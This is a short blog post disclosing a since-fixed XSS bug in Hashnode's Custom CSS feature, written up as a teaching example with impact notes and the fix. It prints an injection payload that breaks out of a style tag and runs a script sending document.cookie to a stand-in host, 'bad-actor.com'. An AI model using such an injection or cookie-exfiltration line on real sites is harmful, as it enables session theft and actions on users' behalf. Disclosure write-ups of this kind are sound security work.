Note: this has been fixed now ๐
Kudos to the Hashnode team for fixing this so fast ๐
Yes, you read that right. I exploited an XSS vulnerability in Hashnode's Custom CSS to add a script tag that can run any malicious JavaScript. This has been fixed now so you don't have to worry about anything anymore ๐
How?
The custom CSS feature on Hashnode allows us to style the site with CSS, which seems to be directly inserted in the head. I just added a script tag at the end of my CSS...
/* ... styles ... */
</style>
<script>
alert(document.cookie)
/* get your cookies, possibly giving access to your account */
fetch('bad-actor.com/?cookie=' + document.cookie);
</script>
What this does is close the <style> tag and insert a new <script> tag which can do anything it wants. This means the inserted JavaScript will be run when the user visits a Hashnode-powered blog with this Custom CSS applied.
Impact
We can't extract any user data or JWTs since they were added as HttpOnly cookies which can't be read by the client using this trick. But you can still do anything on behalf of the logged-in user as long as the JWT works, say post a random comment. You could probably also extract refresh tokens, but I didn't go too deep into that.
What we can do is exploit your trust in Hashnode and, say, redirect you to malicious sites which you may trust since you came from a Hashnode site.
You could also do other annoying stuff like send notifications, eat your RAM and crash your system, or redirect you to the annoying site (warning: that site is super annoying!)
I didn't add any malicious code in there, luckily for you. It has been fixed by converting all <, > and other symbols to their &xxx variants
Key takeaway: Sanitize your database inputs.